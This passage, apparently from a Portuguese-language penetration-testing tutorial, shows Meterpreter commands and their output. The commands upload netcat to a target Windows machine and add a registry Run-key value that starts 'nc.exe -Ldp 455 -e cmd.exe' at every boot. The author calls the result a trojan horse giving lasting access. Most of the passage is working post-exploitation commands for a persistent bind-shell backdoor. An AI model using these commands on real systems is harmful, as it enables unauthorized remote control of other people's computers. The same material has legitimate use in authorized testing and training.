2\u00ba)Passo: j\u00e1 no meterpreter vamos fazer o upload do NETCAT para a m\u00e1quina alvo, isto nos garantir\u00e1 uma porta na escuta para futuros retornos.
\n <\/p>\n
meterpreter > lcd \/pentest\/windows-binaries\/tools\r\nmeterpreter > upload nc.exe C:\\\\Windows\\\\System32\r\n[*] uploading : nc.exe -> C:\\Windows\\System32\r\n[*] uploaded : nc.exe -> C:\\Windows\\System32\\nc.exe\r\n\r\n<\/pre>\n<\/p>\n
3\u00ba) Passo, ap\u00f3s subir o NETCAT , vamos enumerar as entradas no registro <\/p>\n
meterpreter > reg enumkey -k HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\nEnumerating: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\r\n Values (2):\r\n\r\n VMware Tools\r\n VMware User Process\r\n\r\n<\/pre>\n\n4\u00ba) Passo: feito isso, vamos ent\u00e3o plantar o NETCAT
\n<\/p>\n
meterpreter > reg setval -k HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v -nc -d 'C:\\WINDOWS\\System32\\nc.exe -Ldp 455 -e cmd.exe'\r\nSuccessful set -nc.\r\n<\/pre>\n\n5\u00ba) Passo: vamos enumerar novamente e verificar se tivemos sucesso <\/p>\n
meterpreter > reg enumkey -k HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\r\nEnumerating: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\n\r\n Values (3):\r\n\r\n VMware Tools\r\n VMware User Process\r\n -nc\r\n<\/pre>\n<\/p>\n
6\u00b0)Passo: Note que agora temos o valor -nc , ent\u00e3o executemos o valor <\/p>\n
meterpreter > reg queryval -k HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v -nc\r\nKey: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: -nc\r\nType: REG_SZ\r\nData: C:\\WINDOWS\\System32\\nc.exe -Ldp 455 -e cmd.exe\r\n<\/pre>\n\nOk !!! agora toda a vez que o alvo iniciar a m\u00e1quina, nosso cavalo de tr\u00f3ia abrir\u00e1 uma porta de conex\u00e3o e poderemos acessar a m\u00e1quina sem problemas.<\/p>\n
At\u00e9 o pr\u00f3ximo m\u00f3dulo.<\/p>\n
<\/p>\n\r\n\t\t
\r\n\t\t\t\r\n\t\t\t\t\r\n\t\t\t
\r\n\t\t\t